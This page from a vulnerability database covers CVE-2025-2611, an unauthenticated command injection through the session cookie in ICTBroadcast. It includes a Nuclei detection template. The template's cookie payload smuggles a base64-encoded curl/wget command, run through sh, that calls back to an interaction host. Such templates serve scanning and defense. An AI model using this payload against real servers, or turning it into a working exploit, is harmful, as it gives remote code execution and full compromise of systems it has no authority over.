| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability of ICTBroadcast’s software for unified communications and telemarketing lies in the insufficient verification of input data, allowing attackers to execute arbitrary code. | 25 Nov 202500:00 | – | bdu_fstec | |
| CVE-2025-2611 | 5 Aug 202507:39 | – | circl | |
| ICT Innovations ICTBroadcast 安全漏洞 | 5 Aug 202500:00 | – | cnnvd | |
| CVE-2025-2611 | 5 Aug 202515:00 | – | cve | |
| CVE-2025-2611 ICTBroadcast <= 7.4 Unauthenticated Session Cookie RCE | 5 Aug 202515:00 | – | cvelist | |
| EUVD-2025-23629 | 5 Aug 202515:00 | – | euvd | |
| ICTBroadcast Unauthenticated Remote Code Execution | 5 Aug 202518:56 | – | metasploit | |
| CVE-2025-2611 | 5 Aug 202515:15 | – | nvd | |
| 📄 ICTBroadcast Unauthenticated Remote Code Execution | 5 Aug 202500:00 | – | packetstorm | |
| 📄 ICTBroadcast 7.0 Remote Code Execution | 17 Dec 202500:00 | – | packetstorm |
| Source | Link |
|---|---|
| vulncheck | www.vulncheck.com/blog/ictbroadcast-kev |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2025-2611 |
id: CVE-2025-2611
info:
name: ICTBroadcast - Command Injection
author: Chocapikk
severity: critical
description: |
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.
impact: |
Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full server compromise.
remediation: |
Update to a version later than 7.4 or the latest available version.
reference:
- https://www.vulncheck.com/blog/ictbroadcast-kev
- https://nvd.nist.gov/vuln/detail/CVE-2025-2611
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2611
epss-score: 0.0604
epss-percentile: 0.92494
cwe-id: CWE-78
metadata:
verified: true
max-request: 2
shodan-query: html:"ICTBroadcast"
tags: cve,cve2025,rce,ictbroadcast,oast,oob,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: header
words:
- "Set-Cookie:"
internal: true
extractors:
- type: regex
name: cookie_name
part: header
group: 1
regex:
- '(?mi)^Set-Cookie:\s*([A-Za-z0-9_-]+)='
internal: true
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
Cookie: {{cookie_name}}={{cookie_payload}}
disable-cookie: true
payloads:
cookie_payload:
- "`echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "ICTBroadcast")'
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 4a0a00473045022018475d548938dbcfa024ccb587c2a95a0851294b87e1733e7754e76fcc1c254c0221009bc37bb56ef46a5907954a9424799f5b38af0989a16eb3864ff89f900e1858ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation